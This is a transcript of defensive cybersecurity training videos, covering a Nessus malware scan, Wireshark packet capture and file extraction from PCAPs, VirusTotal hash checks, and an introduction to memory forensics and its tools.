After I've specified that, now I can go back and really Save this. And we can see our scan has been saved.
[Video description begins] He clicks a button called "Save". The My Scans page opens and a scan called
"Scan for Malware - East1 LAN" is displayed in the table. [Video description ends]
Scan for Malware- East1 LAN, so I'm going to select it, and I'm going to click the Launch button. And after a
moment, it'll pop-up to the top of our list and we'll see that the scan has begun. Once our malware scan is
completed, we can go ahead and click on it in the list to view the results.
[Video description begins] The corresponding page opens. Several Vulnerabilities status bars are displayed
for different hosts. [Video description ends]
The primary point of interest here, according to the legend, will be the color red, which indicates critical. And I
can see on one particular host, I've got a problem. So I'm going to go ahead and click on that red item.
[Video description begins] The corresponding page opens. [Video description ends]
We've got a critical item here, the UnrealIRCd Backdoor has been detected, and it can allow an attacker to
execute arbitrary code on the affected host.
[Video description begins] He clicks an option with a critical severity. The corresponding page opens. [Video
description ends]
So it also provides a solution. So it says, re-download this software, verify it using the MD5 / SHA1
checksum, and re-install it. So in other words, make sure that what you're downloading is the real version of
the software. And make sure it's a version that doesn't have known vulnerabilities associated with it. So I'm
going to click Back to Vulnerabilities up at the top.
[Video description begins] The corresponding page opens. [Video description ends]
We can see here a couple of other informational items, but we're not so concerned with those specifically. So
we can see that this is running on a host with the listed IP address on the right, we can see it's a Linux-based
Kernel.
[Video description begins] He highlights the following text: IP: 192.168.4.56. [Video description ends]
[Video description begins] He clicks the Vulnerabilities tab. [Video description ends]
So we see our UnrealIRCd Backdoor vulnerability, and we can see that there is a count of 1.
[Video description begins] He clicks the UnrealIRCd Backdoor Detection option and the corresponding page
opens. [Video description ends]
And when you look at it from this perspective, and you scroll down to the bottom, you will see the affected
hosts.
So this is not too bad. We've got one host that needs our attention, but overall, on the network, because we can
see all of the devices that were scanned here, it looks pretty good.
[Video description begins] He clicks a link called “Back to Vulnerabilities” and the corresponding page
opens. He clicks the Hosts tab. [Video description ends]
But bear in mind that this is only going to be true based on how up-to-date the scanning engine is here in this
tool, in this case, Nessus.
[Video description begins] The corresponding page opens. He selects a tab called “Software Update”. [Video
description ends]
So if I were to click Settings up at the top, I can look at the Software Update settings to make sure that the
components for this scanning tool are always kept up to date here, the update frequency is Daily.
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined intrusion detection tools and techniques, and network traffic analysis for
detecting malicious attacks. We did this by exploring how to analyze suspicious log entries. How to view a
sample Burp Suite report, and how to use Nikto to scan a web app. We looked at how to perform a Kali Linux
cloud deployment. How to install and configure the Snort IDS tool and create a Snort IDS rule. We looked at
how to analyze an ICS traffic capture and HTTP user authentication traffic. We looked at how to perform
voice over IP traffic analysis and online network traffic analysis, as well as how to decrypt wireless traffic in
Wireshark.
Next, we took a look at the use of hashing to detect file changes through steganography. We looked at how to
use the eero app to monitor, block, and configure notifications for Wi-Fi connected devices. We looked at how
to use Aircrack-ng to crack protected Wi-Fi networks and how to use Kismet to detect Wi-Fi networks.
Finally, we looked at how to use Nessus to audit Amazon Web Services and to scan land hosts for malware.
In this course, you'll explore the basics of network packet capturing, a process used to intercept and log traffic
occurring over a network. You'll also examine the purpose and features of some standard tools and techniques
to preserve and analyze a computer system's most volatile data. You'll then learn to use some of these tools and
techniques to achieve various digital forensic analysis goals.
Next, you'll recognize computer forensic best practices, including locating evidence in the Windows Registry.
Finally, you'll learn how to differentiate between the purpose and features of the various tools available for
conducting hard disk forensic analysis.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview [Video description ends]
Hello, my name is Peter Adamson. I am going to be the instructor for this course on cyber crime
investigations.
[Video description begins] Your host for this session is Peter Adamson. He is a Security Software
Developer. [Video description ends]
My background, I am a cybersecurity expert who has been working in the field for a number of years now. I'm
an experienced security software developer, as well as an experienced Red Team/Blue team member. In this
course, we're going to explore how to perform cyber crime investigations including techniques, tools and best
practices involved in computer forensics analysis.
I'll start by examining the concept of packet capturing as it relates to cyber ops forensics and exploring
network forensics and vulnerabilities. I'll then demonstrate how to gain intelligence from an attack using
packet capturing and show how to reconstruct artifacts and files from a PCAP file using Wireshark. Next, I'll
examine working with volatile data, compare tools for conducting analysis of a computer's memory, and show
how to use the volatility framework to process an extraction of computer memory. I'll continue with an
examination of the Windows Registry and the information it contains, how to navigate the Windows Registry
to locate evidence, explore the Windows Registry tools and techniques for analyzing registry changes. I'll then
explore the categories of digital evidence and techniques to gather digital evidence, as well as the various tools
available for performing computer forensic analysis. Lastly, I'll examine the SANS Investigation Forensic
Toolkit, SIFT, and demonstrate how to mount evidence using SIFT.
[Video description begins] Topic title: Packet Captures. Your host for this session is Peter Adamson. [Video
description ends]
Now let's look at the idea of packet capturing as it relates to our cyber ops forensics. And to start, let's go with
the definition of what packet capturing is. Packet capturing is data that's intercepted over a network. So what a
packet is, is essentially a bundle of data that is being sent from one computer to another. And that bundle of
data contains communication information regarding whatever we want to talk about. So when we intercept that
data using a packet capture, we can start to analyze those conversations by looking through all of these packets
that are going and transmitting over a network.
And that's very valuable to us from a forensics point of view. So why would we do a packet capture and what
would we get out of that packet capture? Well, it turns out that packet captures are useful for a wide array of
things in our world. One thing that we can do through it is identify security threats. You can see what kind of
information is being transmitted over a network. You can also see what files are being transmitted over a
network. So if your computer is beaconing back to a command and control server, you can identify that
through a packet capture. If malicious files are being transferred over a network, you can also identify that via
packet capture. Or if you see communication that is out of the norm, that's anomalous, then that's also
something that we can see in a packet capture. So in that way, they help us identify security threats. They can
also help us identify data loss.
So if there is data that's supposed to be making it from one point to another and it's not getting there. Well, we
can kind of see by putting a packet capture at different points along the wire where data is being lost. And, of
course, the packet capture helps us perform forensics analysis which, in this video and course, is our primary
focus. We can take these packet captures, store them, and look at them at our leisure during an investigation to
try and find out what happened during an incident. So if we know that an incident happened in a certain
timeframe, we'll take the packet capture from that timeframe and try to start analyzing. And find out who was
talking to who, again, what files went over the network at that time. Where should we start pulling the strings
to try and further our investigation? Well, related to the idea of identifying data loss, packet captures can also
help us troubleshoot network issues.
If two machines should be able to communicate to each other and they can't, maybe there's a firewall issue. Or
that could be host or network-based firewall, or the intrusion detection system is blocking our net packets. Or
maybe the VLAN configuration on our switches is incorrect. There's a lot of reasons in a network why
communication could be disrupted, and the packet capture can help us investigate that and troubleshoot it. And
then, finally, identifying network congestion. If we're trying to perform load balancing and keep all of our
different communication lines somewhat equal, then it's a good idea to perform a packet capture. And find out
if one line has a significant higher traffic load than another one. I mentioned earlier that we can think about
packets like bundles of data. And within those bundles of data there are two main components. There's our
payload and our header. And there's a variety of different types of packet captures.
We can do a full packet capture where we capture the header and the payload. We could do a packet capture
where we only capture the header. So we can tune it how we want to, depending on how much data that we
want to store. Capturing the header and payload takes up more storage space but provides more information.
Doing a packet capture on just the header is more efficient from a storage and CPU usage point of view, but it
doesn't provide as much information. Now what is contained in these two different parts of our data? Well, the
header contains all of the metadata associated with the packet. So this is going to be things like source IP
address, destination IP address, source port, destination port. All of the information that the packet and the
processors need to know to get the information from one computer to another. And the payload is the actual
information that's being transmitted. Now oftentimes our payload is encrypted.
So, for example, in the case of HTTPS communication, we have encrypted payload information, which is not
going to be as valuable to us because we can't inspect it as easily. But if it's unencrypted transmission like
HTTP transmission, well, then it's very valuable to get the payload because we can go in there and see exactly
what is being talked about. When we're doing a packet capture, there are two ways that we can do it as well.
We can either do an inline packet capture where we have a physical or a virtual device that's put directly on the
line, so all communication has to go through it in order to continue. Or we could have a mirror port set up on
something like a network switch that copies out the data that's going through it and sends a copy of that data
out to our packet capturing device. And that would be an out-of-band sort of way of doing a packet capture.
Once our packet capture is complete and we have our data stored in a PCAP file of some sort, our next step is
to perform an analysis in that packet capture.
We do this using a packet analysis tool. The most common, widely-used one is called Wireshark. It's a free
tool and it is extremely powerful when it comes to performing packet analysis.
Objectives
[Video description begins] Topic title: Network Forensics. Your host for this session is Peter Adamson. [Video
description ends]
Now let's get an overview of network forensics and network vulnerabilities. What do we mean when we talk
about network forensics? Well, it's a broad field and a broad definition. But a major part of network forensics
is the identification, capturing, and analysis of network events, which is done to discover the source of network
security incidents and vulnerabilities. So what this means is in a typical network, there's communication
traveling between all computers on the network. So computer A to B, computer B to C, computer A to C, and
vice versa, they're constantly talking back and forth to each other. So we are trying to identify, capture and
analyze that communication pattern and find out what's happening from a security point of view.
And this sounds pretty simple in theory, we just capture the communication and look at it and we should be
able to see what's going on. Unfortunately, when it actually comes to trying to implement this, the complexities
build up really quickly. First off, you need to be very familiar with some complex and powerful packet capture
and analysis tools. You have to have a good understanding of the infrastructure of the network that you're
monitoring so that you know, where you should be capturing packets? How many packets you should be
capturing? What devices you're interested in? What kind of communication you're interested in? How much of
the communication you're looking at is encrypted? If it's encrypted, can you still get something from the
payload?
How to extract files out of the communication. And that's just scratching the surface. So very, very quickly,
this packet capture and analysis for network forensics becomes quite complex. Something you may have heard
me mention there was how much of this data do we capture? And the reason I brought that point up is because
unless your network is extremely small consisting of only a couple devices, which very few networks that
you'll be doing a security investigation on are, it's not feasible to capture all network data traveling within a
network. There's just too much of it. It's overwhelming. Any kind of relevant incident or relevant information
is going to get lost in the sea of data that's just going to be totally impossible to search through. So it's
important to, have an idea of what kind of data you want to capture.
Now this might mean something like, I'm only interested in HTTPS traffic on this network or I'm only
interested in FTP traffic. So you could narrow it down with the protocol, or I'm only interested in this subset of
IP addresses. So maybe you're only looking at a subnet on the 192.168.1.1/24 subnet. Because otherwise,
you're just not going to be able to look at the data. And the storage space as well becomes rapidly filled up
when you're capturing all this data. The size of your packet captures becomes very large very quickly, so you
also run out of places to put the PCAP data. And then it takes longer to load that PCAP data into your analysis
tools, which means it's going to take that much longer to start doing anything. And it just becomes a hassle. So
it's very important to pinpoint exactly what you want to be capturing before you start your capture.
And that's because at the end of the day, when it comes to network forensics, packet captures are often our
backbone of our investigation, helping to preserve the data for future analysis. We can come back to these
packet captures time and time again, looking for different aspects of our investigation. Try and go back and
find maybe something we missed on the first go around. Or something we find later down the road triggers us
to say, maybe this is something we should go back and look for in the packet capture. So it serves as persistent
evidence for us to keep going back to as a reference. And that's why it's important that our packet capture is
focused and relevant on the proper things. Because we have to be able to come back to it and know how to
efficiently come back to that packet capture to find exactly what we want.
We can also use these packet captures to identify vulnerabilities in a network that either have been taken
advantage of. And we're trying to go back and find out which vulnerabilities were used to instigate an attack.
Or to identify vulnerabilities that could be used in the future to instigate an attack. And so we have two types
of vulnerabilities. We have our internal network vulnerabilities, and these are more focused around the
architecture of your network. So these vulnerabilities are from the point of view of where could something go
wrong from inside your network. So something like a bottleneck, where is a large amount of traffic potentially
flowing through, where you're actually getting a slow down on your bandwidth. These vulnerabilities also deal
with authenticated users and what they could do in a network, how they could traverse it once they've got these
kind of authentications.
And our second kind that we can see from a packet capture is external network vulnerabilities. So these are
going to be vulnerabilities that could be found from your external facing devices. So things like your network
firewalls, your intrusion detection systems, or any device that's externally facing that might have some ports
open. So an example of this would be like a DDoS attack. If you had a web server open to the world, and you
don't have sufficient protection. Well, you could have a vulnerability there too, distributed denial of service. So
looking at our packet capture and our packet analysis can help us identify these vulnerabilities.
Objectives
[Video description begins] Topic title: Capturing Network Traffic. Your host for this session is Peter
Adamson. [Video description ends]
In this video, we're going to demonstrate performing a packet capture, in order to gain intelligence from a
potential cyber attack. So for our purposes in this demonstration, let's pretend that the computer I'm currently
on, we suspect it's been compromised. There has been a piece of malware that's made its way into our system,
and we want to know what it's doing.
[Video description begins] A Kali Linux Desktop screen displays. It contains various files and folders. [Video
description ends]
In order to do that, we are going to perform a packet capture. And what that is going to let us do is see who is
talking to this computer, and who this computer's talking to. And then from there, we're going to be able to
analyze that packet capture, and find out if anything out of the ordinary or malicious is going on.
[Video description begins] He selects the wireshark option from the Start menu. A dialog box titled,
Authenticate displays. It contains some text and a field titled: Password. The Cancel and Authenticate buttons
display at the bottom. He enters the Password and selects the Authenticate button. [Video description ends]
And Wireshark is going to allow us to look at the network traffic going into and out of our machine.
[Video description begins] The Wireshark Network Analyzer window displays. The menu bar contains the
following options, including: File, Edit, View, Analyze and Statistics. The toolbar beneath the menu bar
contains the following options, including: capture options, start a new live capture, stop the running live
capture and restart the running live. A search bar to Apply a display Filter displays underneath the toolbar.
The windows pane contains two sections, namely: Capture and Learn. [Video description ends]
So the first thing that we need to do when we start a packet capture is find out what interface we want to do
that on. So in order to do that, I can do something like ip address.
[Video description begins] The blank terminal window displays. The menu bar contains the following options,
including: File, Actions, View and Help. [Video description ends]
[Video description begins] He enters the command ip address. [Video description ends]
and look at your networking. But what you're looking for is the interface that has an ip address configured. So
in our case, it's this address right here, eth0, it has 10.0.2.15 configured.
[Video description begins] He highlights the second interface with name eth0. [Video description ends]
Which means this is our interface that's communicating with the internet. Most of the time, this is what you're
going to want, sometimes in edge cases, there might be other interfaces that you want. But for our purposes
right now, we want this interface. So now that we know our interface, we can do eth0.
[Video description begins] He closes the terminal window. The Wireshark Network Analyzer window displays.
He selects the option: eth0 which is present under the Capture section. [Video description ends]
So I'm going to double-click on that, and now we are starting a packet capture on eth0.
[Video description begins] The screen titled: Capturing from eth0 displays. The menu bar contains the
following options, including: File, Edit, View, Analyze and Statistics. The toolbar beneath the menu bar
contains the following options, including: capture options, start a new live capture, stop the running live
capture and restart the running live. The windows pane is divided into three horizontal sections. The first
section contains a table with the following column-headers, namely: No., Time, Source, Destination, Protocol,
Length and Info. [Video description ends]
Right now you're not seeing any packets coming in. On a normal machine you'd see a lot more traffic going in
and out, because machines are pretty chatty in general. They're always communicating with various different
DNS servers, time servers, name resolutions, those kind of things. But because I'm on a virtual machine right
now, I don't have a lot of traffic going in. So what I'll do is I'll go and generate a little bit of traffic just by
browsing the internet. So if we start up a browser here, and boot into it,
[Video description begins] He opens the Firefox browser. [Video description ends]
and we start to browse around. Let's go over to Google, and we'll do a search for Wireshark. And then we'll go
in and say, packet capture. Then we should have generated traffic here, which we did.
[Video description begins] The corresponding browser search traffic displays in the Capturing from eth0
window. [Video description ends]
So now you can see, we've populated our packet capture with information. So what are we looking at here?
Well, there's three different sections to our screen. Up here, we have a list of every packet that's been captured
during our session. What we'll do now is we'll pause the packet capture, so now we've stopped our capture. In
here, we have a list of every packet that we have captured during our session. And we get information, it's got
a number, the time that it came in from the start of our packet capture, the source ip address, the destination ip
address. So we can see here, this is coming from external to us, whereas this is starting from us going to
external. Because the source is our IP address, and here the destination is our IP address. We can see what kind
of protocol they've been using.
So here it's been all TCP, so the bit length, and some of the information about what's going on. So here, it's
been an ACK, here, where these are all Keep-Alive ACKs. We can try and find a little bit more interesting,
here's just application data. So this is where we start to get some information. Now, if we see a communication
out of the norm, and let's assume for our purposes, this address right here, 23.64.57.215. We could pretend
that, that is a command and control server that a piece of malware is communicating to. It's not, but let's
pretend that it is. So we would look at our packet capture and say that's suspicious. Why are we
communicating to that server? So what we can do is click on that and open up a window,
[Video description begins] A window titled: Wireshark.Packet 3984.eth0 appears. It is divided into two
horizontal sections [Video description ends]
which is these two screens here are the same as the two screens here.
[Video description begins] The two sections of the Wireshark.Packet 3984.eth0 window are similar to the
bottom two sections of the Capturing from eth0 window. [Video description ends]
[Video description begins] He explains the options present in the first section. [Video description ends]
So this is where we can see all the different layers of the network communication protocols coming into play.
So we have our frame information here, telling us various information about when it arrived. And then we can
go into our Ethernet layer, and look at the destination and source information on our protocol. Then we can go
into the Internet Protocol Layer, we're using IP Version 4. We can see our source is our local machine, and our
destination is our pretend command and control server. And then we can get various information about what
flags have been set. The source destination again, header checksums, the checksum status. Then we can go to
our TCP layer and get even more information about the source port. Though the source port tends to be
random, you don't get a lot of information about that. But we can get information about destination port, so
here it's 443, which is HTTPS.
Various more information, window size. And oftentimes you can look in here and see if it's a custom made
protocol, or if it's an attack on trying to make a malformed packet. You can go in here and see information that
might look out of the normal. There's various attacks that use all of these such as the Window size value, and
you could get indicators out of that. And then we can look at the TLS layer, and see the Encrypted Application
Data. And then down here in the bottom, we have the x information about the actual protocol that we've
captured. And on the right is the ASCII interpretation of that byte data.
So you might see interesting information here, right now there's not much that we can get out of it. But
sometimes you can actually see relevant information to what you're trying to decipher here. So we'll close that.
So this is how we would go about capturing the network information on a machine that we are suspected of
being compromised. Now, the last thing that we want to be able to do is save this data for future use. If we are
using this for forensics, then there's a good chance that we're going to want to come back to this time and time
again, and keep looking at this network communication. So in order to save this for persistent use, we're going
to go up here and click Save As.
[Video description begins] He selects the File option from the menu bar. A context menu appears. It contains
the following options, including: Open, Open Recent, Close, Save and Save As. He selects the option Save As.
The Save explorer window displays. [Video description ends]
[Video description begins] The blank terminal window displays. [Video description ends]
[Video description begins] He enters the command: cd Desktop/. [Video description ends]
[Video description begins] He enters the command: sudo wireshark malicious.pcap. [Video description ends]
So this is how we could transfer across to a different forensics team as well, or other security analysts and say
here's the information. What do you see out of this? And continue our investigation from there.
Objectives
illustrate how to reconstruct artifacts and files from a PCAP file using Wireshark
[Video description begins] Topic title: Working With PCAP Files. Your host for this session is Peter
Adamson. [Video description ends]
[Video description begins] The Kali Linux Desktop screen displays. [Video description ends]
artifacts from a PCAP file. So we're going to use Wireshark for this example, and you can see here on the
desktop I have this existing packet capture, example.pcap. So this is what we're going to use to reconstruct the
packet capture and examine for forensic analysis. So what we're going to do is open up this packet capture in
Wireshark, so I'm going to open it up.
[Video description begins] The blank terminal window displays. [Video description ends]
[Video description begins] He enters the command: sudo wireshark example.pcap. The next line prompts for
the password. He enters the password. [Video description ends]
And you can see we've reconstructed the packet capture now and
[Video description begins] The window titled: example.pcap displays. [Video description ends]
we can start to do our analysis. So looking through, we can see we have a lot of different protocols in this
packet capture, we've got some DHCP, DNS, NBNS. If we go down here, we've got some TCP and then a lot
of TCP traffic at the bottom. So we want to start to investigate this packet capture to try and extract
information out of it, try and get objects, see what transpired here.
So the first thing that we can do is, let's go to a TCP packet. I just picked one at random here, where the source
is 107.180.50.162. The destination is 10.6.27.102. And one thing that we can do in Wireshark is to follow the
TCP stream.
[Video description begins] He right clicks on the 107.180.50.162 Source. A context menu appears. He selects
the Follow option. A context sub menu appears. He selects the option TCP Stream. [Video description ends]
So if I right-click and go to Follow TCP Stream, this is going to try to reconstruct the conversation for us that
went on.
[Video description begins] A window titled: Wireshark .Follow TCP Stream(tcp.stream eq1).example.pcap
displays. It contains various details. [Video description ends]
So we can see here, this is the entire conversation that happened between these two IP addresses. So we can
see up here, here's the get request. And you can actually see as I clicked on it, it shows you which packet this
came from. So here, this GET request came from this packet 71. Then the next communication came from
packet 73. And we can see here's the HTTP header. And then we can see all of this traffic here,
[Video description begins] He scrolls down in the window. [Video description ends]
We can't really get much information out of it, but we can still follow the whole conversation. Then we go
down here to the bottom. And so that's what we've gotten out of that. Sometimes if this is unencrypted
transmission, you can actually read the payload directly here and that could be extremely valuable. Sometimes
you'll get information like people's names, passwords, various confidential information that might be
transmitted incorrectly. Now we can see that after I've right clicked and followed the TCP stream, I've actually
applied a filter up here, TCP stream equals 1. So I'm only seeing packets related to that TCP stream now. So
I'm going to remove that filter so that we can go back to the main. Now I've got no filter applied, and we're
back on the main packet capture. So that's the first thing that we can do. Now, the other thing that we can do is
try to start to extract objects out of this file.
In order to do that, we want to use an unencrypted transmission, because otherwise we're not really going to be
able to get the file out. So, in this case I'm going to use HTTP as a filter. So now I've filtered on HTTP because
it's an unencrypted transmission. And now that I've filtered on HTTP, what I can do is try and see if any files
were actually transmitted over this conversation. So I'm going to say File Export Objects HTTP.
[Video description begins] He selects the File option from the menu bar. A context menu appears. He selects
the option: Export Objects. A context sub menu appears. The context sub menu contains the following options,
namely: DICOM, HTTP, IMF, SMB and TFTP. He selects the option: HTTP from the context sub
menu. [Video description ends]
[Video description begins] A window titled: Wireshark.Export.HTTP object list appears. It contains the data
in tabular form having the following column headers, namely: Packet, Hostname, Content Type, Size and
Filename. The tabular list contains three items with Packet name as: 45, 337 and 1456. The Save, Save All,
Close and Help buttons display at the bottom. [Video description ends]
And here, I actually have a list of all the files that were transmitted during this conversation. So we can see
we've got this packet, 45, came from this host name msftncsi.com. The content type is just plain text, 14 bytes.
And the file name is ncsi.txt. And then we have another one which has transmitted a Microsoft Word
document, which has an Invoice&MSO-Request. And then we have a x-msdownload, which is an executable
here knr.exe.
So we can actually from Wireshark save these files. So I'm going to save them here. So you can see we've got
them now on our desktop.
[Video description begins] The Kali Linux Desktop screen displays. [Video description ends]
So out of that PCAP, we've actually extracted these three files. So let's open them up and see what they say,
okay?
[Video description begins] He opens the ncsi.txt file. The Notepad window displays. The menu bar contains the
following options, namely: File, Edit, Search, View, Document and Help. The content pane displays the
following content that reads: Microsoft NCSI. [Video description ends]
This one says, just Microsoft NCSI, which we can see, we've got the file, we have this invoice request,
[Video description begins] He selects the Invoice&MSO-Request.doc file. A dialog box titled: Open With
displays. [Video description ends]
which is a Microsoft Word document. Now something to be wary of here, oftentimes when we're extracting
files from a PCAP or extracting artifacts, they tend to be because we are investigating a compromise or a
malicious attack. So we need to be careful because there's a good chance that these are malicious files. So it's a
good idea that you are always doing this in an isolated environment. At a minimum you should be on a secure
virtual machine. And taking all possible other steps to secure your environment before you start to tackle these
files.
And then you need to do your due diligence with the files once they're opened.
[Video description begins] The terminal window displays. He enters the command: cd Desktop. [Video
description ends]
So what we can do, Is actually check the files now that we've got them, and make sure that they are what they
say there.
[Video description begins] He enters the command: ls. The output displays the list of files and directories in
the desktop. [Video description ends]
So on Linux, we have this utility called file and we can use it to check the actual information behind the file to
make sure it is what we think it is to be starting off with.
[Video description begins] He enters the command: file Invoice\&MSO-Request.doc. The output displays the
files details. [Video description ends]
So we can see that this is a Windows file. The name of creating application is Microsoft Office Word. So we
actually do have a Word file here, you can't trust it just says .doc, that could be anything trying to obfuscate it.
Similarly, we could do, okay, and this is an executable for Windows.
[Video description begins] He enters the command: file knr.exe. The output displays the file details. [Video
description ends]
Now the next thing that we could do is check the md5sum
[Video description begins] He enters the command: md5sum Invoice\&MSO-Request.doc. The output displays
corresponding details. [Video description ends]
And we could take this sum, both of these sums, either of them, and we could go to something like VirusTotal.
[Video description begins] The Firefox browser screen displays. He searches and opens VirusTotal website. A
page titled: VirusTotal displays. The content pane contains three tabs, namely: FILE, URL and SEARCH. He
selects the SEARCH tab. It contains a search bar to find URL, IP, domain, or file hash. [Video description
ends]
And in VirusTotal, we could actually put into those, we could put in this file hash, that we just got.
[Video description begins] He copies the sha256sumInvoice\&MSO-Request.doc file hash in the search bar.
He hits the Enter button. [Video description ends]
And see if it comes back with anything malicious. And we can see well, it certainly seems like this is
malicious. 38 engines have detected this file, and it looks to be a Trojan of some sort.
[Video description begins] The screen displays the scan results. The content pane contains the following tabs,
namely: DETECTION, DETAILS, BEHAVIOR and COMMUNITY. Currently, the DETECTION tab is
selected. [Video description ends]
So here, the odds are good that we've detected a malicious file in this transfer. So now if we go back to
Wireshark, we can close this I'll get rid of the filter.
So we're back to the main communication. We do have other options when we're exporting objects. So we can
see we've got DICOM, IMF, SMB, TFTP.
So when we're going through and analyzing these PCAPS, we should always be making sure that we do our
full coverage and check to get as many of these objects out as we can. The more artifacts and objects we can
extract from PCAP, the more efficient our investigation will be, and the more likely we are to be able to track
down any kind of malicious attack from a source perspective.
define volatile data and identify the possible data contained within
[Video description begins] Topic title: Volatile Data. Your host for this session is Peter Adamson. [Video
description ends]
Let's talk about volatile data and what kind of information is contained in volatile data, and then how that
information is useful to us from a forensics point of view. So volatile data is data that is stored in your
computer's short-term memory. It's there and stored while your computer is running, but as soon as it's turned
off, the data is wiped. So your RAM is an example of volatile data. Some examples of volatile data, things like
your browsing history, chat messages, passwords. These are all types of data that could be stored, and are
frequently stored in your RAM or volatile data. So they exist as a temporary cache in your short-term storage,
and then they're wiped once your computer is turned off.
So how do forensics and investigations differ when we're dealing with persistent data such as on a hard drive
versus volatile data such as in our short-term memory? Well, the hard drive, we can really access those files at
any time. They're persistent, it doesn't matter if the computer turns off and then turns on again, they'll still be
there. It's more of a after the fact investigation when we're dealing with a hard drive. We're going in to try to
find if there's any footprints leftover from a potential attack, any files that may not have been cleaned up.
Whereas, a short-term memory is a more time sensitive investigation. We have a limited time window to grab
that memory capture before it's wiped. If the computer is turned off, we lose that state of the memory at that
time. So when we're dealing with memory forensics, you can think of it more like a live investigation. We're
still capturing the memory with a memory capture and investigating it later.
But we're looking at a live state of the computer as it was when that memory capture was taken. So from the
memory, we can kind of see how potential malware was actually running, what it was affecting in that system
at that time. And we call this part of our investigation memory forensic, which is identifying evidence not
located on a hard drive or in persistent memory. So our goal here is very much centered on trying to find any
kind of trace or footprint of malware that might be leftover. Because malware does do a very good job usually
of cleaning itself up from logs and making sure that any files are not left behind. So oftentimes, this is a good
place to go looking for that kind of information. So what are we getting out of these memory dumps? What is
the value coming back to us as forensic investigators? Well, we can, through the analysis of a memory dump,
identify the cause of an incident. And this is especially valuable if we have multiple memory captures from a
machine.
So what we can do oftentimes is if we have a sample piece of malware, we could deploy it into a test lab. And
before we deploy the malware, we take a baseline memory capture of the uninfected machine. And then we
deploy the malware and take another memory capture of the infected machine. And this can help us build up a
signature or an image in our minds of how this malware behaves. So by seeing what a system looks like before
and after, we start to learn how this malware behaves and changes the system. And then we can apply that
knowledge and go into other memory captures, and start to try to find out what the root cause of an incident
was. We can say this flag or this piece, this part of the memory is behaving weirdly. I've seen that before, this
is what caused the incident. And it also helps us to identify recent computer activity.
There may be activity that happened on the computer that wasn't logged or nothing persistent came of it. The
user was on there or a file was on there but nothing else new was saved or actually logged to the hard drive.
And so we can go in and see what people have been doing on this machine. Some of the more common types
of data will pull out a memory. Things like network connections, open ports, active connections to and from a
machine that can be logged and found in memory and very useful to find out if a piece of fileless malware is
beaconing back to a command in control center. And when I say fileless malware, that's what fileless malware
means, it's running in the memory, it's not persistent on the hard drive. We can also find account credentials
that have been used and have been cached in the memory which can be very useful to us. The processes that
are running at the time of the memory capture. So we have a full list of all the processes that are there. We can
see where those processors are listed and try to find out have any these processes been trying to hide
themselves?
Do any of them look malicious? And then the encryption keys might also be stored in the memory, which can
maybe help us to look at potentially encrypted malicious data. And in today's world, these stealth attacks using
fileless malware are becoming increasingly common. It's a very popular attack vector simply because it is
much more difficult to detect. So from an attacker's point of view, they're less likely to be caught using these
techniques. Things like firewalls, anti-viruses, intrusion detection systems, they're not going to catch these kind
of fileless attacks. So that's why it's very important to have this skill set available to you to be able to perform
these memory forensics to try and detect this attack vector. And the reason that our traditional security systems
won't detect these attacks is they're just not built for it usually.
They are designed to look more at your persistent storage and to look at network traffic in the case of an
intrusion detection system on the network. They're not designed to go into your running memory and probe it
to see what's going on there. But more advanced enterprise security systems do have these kind of memory
forensics built-in, it's not that they don't exist, they are there. But you will have to make sure that the tool that
you're using does have that forensics capability.
Objectives
[Video description begins] Topic title: Memory Forensics Tools. Your host for this session is Peter
Adamson. [Video description ends]
Now let's talk about some of the tools and techniques that are available to us to conduct an analysis of a
computer's memory. And it's important because the memory is going to include key evidence. So we really
want to have a good idea of how we're going to go about collecting it. And the way that we collect it is going
to be a little different in every case. It's going to depend on the operating system that we're trying to collect
memory from, what kind of network we're collecting it from, and what we have available to us at the time.
And when we're doing these forensics, oftentimes what we're trying to do is prove or disprove that something
happened or did not happen. So we might be going into prove that a certain machine was compromised, or to
prove that a machine was not compromised.
And in order to do this, we have to have a clear understanding of what our goals are, what kind of information
we're going to be gathering, and how we're going to go about doing that. So the first thing that we want to do is
look at our target systems and identify recent user activity. This is really good from the point of view of
finding out what's been tampered with on the machine. And from an attribution point of view, it's a starting
point. Now just because a machine tells you that a user has done something, it doesn't mean that the person in
the real world associated with that user account is the one who has performed that action. Somebody could
have commandeered that account and done something on behalf of that user without their knowledge, but it is
a starting point. We can at least identify this user did this malicious activity. And from there, we keep pulling
the thread and trying to go deeper and gather more evidence for our case.
So then we're going to start to look for things like malware. We're going to look in the running processes lists
and find out if any of these processes have tried to hide themselves or cover up their tracks. Is there processes
that are running that shouldn't be or are they trying to inject themselves into another running process? And
look for that kind of thing to find out what is on the machine. So that's going to be our unusual processes. And
then we're also looking for any kind of communication patterns. Are there processes that have made use of
open ports or opened ports themselves in the machine? Tried to create a reverse listener such as a reverse TCP
shell. Or tried to beacon out to a command and control center. So these are the next pieces of evidence that
we're going to try and gather. When we're dealing with these different kinds of memory dumps and memory
captures, there are a lot of different formats that they'll come in that we can feed into our tools. So we need to
be familiar with what we are expecting is a file format in order to know what kind of tool to use and how to
handle that file format.
There's more than what we're going to talk about here, but these are some of the most common ones. So there's
your raw format, which is one of the most common ones. This is generally what you'll receive when you
capture memory off of a live machine that is currently running and you take a memory capture from it. Then
there's a crash dump. This is generally taken by the operating system. And it happens when the operating
system or computer crashes and the machine will dump out the volatile memory to this kind of file. There's a
page file. This is usually associated with something like virtual memory and it's actually stored on the hard
drive but it's still volatile. There's a hibernation file. So when you put your computer to sleep or hibernate, this
is a volatile memory state, taken by the operating system to allow it to restore its state to what it was in before
the hibernation was initiated.
And then there's virtual machine snapshots. So when you have a virtual machine, you can take a snapshot,
either with its memory as in the running state or the turned-off state. And these snapshots can be used as a
form of volatile memory to analyze as well. And when it comes to memory acquisition tools for either
capturing or analyzing volatile memory, there are lots and lots of different options available in the market,
whether they're free or commercial. But we're going to talk about some of the more common ones. So the first
one I'm going to talk about is Volatility Suite. This is very, very common, you will almost always hear
volatility in the same discussion as memory analysis. And that's because it's very, very useful. It's an extremely
powerful tool, it's free and open source. It runs on all your standard operating systems, Windows, Linux, Mac.
It's primarily built to analyze your memory. It's not designed to help you take the memory capture itself. But it
has the capability to analyze raw memory files, crash dumps, VMware or VirtualBox snapshots checkpoints,
so your virtual machine memory. Very, very useful and a very good tool to have in your tool belt. Another one
is Rekall. This is more of an end-to-end solution. It's really, really good for incident responders and forensic
investigators. And that's because it has both acquisition and analysis tools. So this will help you take your
memory capture as well as analyze it in the same tool. Another nice tool is Helix ISO. And the advantage of
